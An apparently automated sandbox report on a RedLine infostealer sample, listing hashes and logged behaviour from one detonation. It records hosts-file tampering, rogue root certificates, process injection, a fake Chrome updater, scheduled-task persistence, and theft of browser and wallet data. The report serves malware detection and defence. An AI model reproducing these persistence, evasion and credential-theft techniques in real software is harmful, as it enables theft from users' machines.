Malware Analysis Report

2025-01-18 08:36

Sample ID 230810-r5ab7sfd9x
Target d6448d3082b315cf8dfa2dbbd9962b2c.exe
SHA256 5d6b4e79354059546f003225ed6a08bc4636d66876b714f24440f5568e5e7f81
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5d6b4e79354059546f003225ed6a08bc4636d66876b714f24440f5568e5e7f81

Threat Level: Known bad

The file d6448d3082b315cf8dfa2dbbd9962b2c.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Loads dropped DLL

Themida packer

Executes dropped EXE

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-10 14:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-10 14:46

Reported

2023-08-10 14:48

Platform

win7-20230712-en

Max time kernel

105s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2696 set thread context of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2188 set thread context of 1048 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 2188 set thread context of 1568 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 705de09d99cbd901 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3020 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3020 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3020 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3020 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2208 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2208 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2208 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2208 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2052 wrote to memory of 2832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2888 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2888 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2888 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2744 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 2304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 2304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 2304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 1504 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 1504 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 1504 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2764 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2764 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2764 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2940 wrote to memory of 2188 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2940 wrote to memory of 2188 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2940 wrote to memory of 2188 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2936 wrote to memory of 1924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2936 wrote to memory of 1924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2936 wrote to memory of 1924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2936 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2936 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
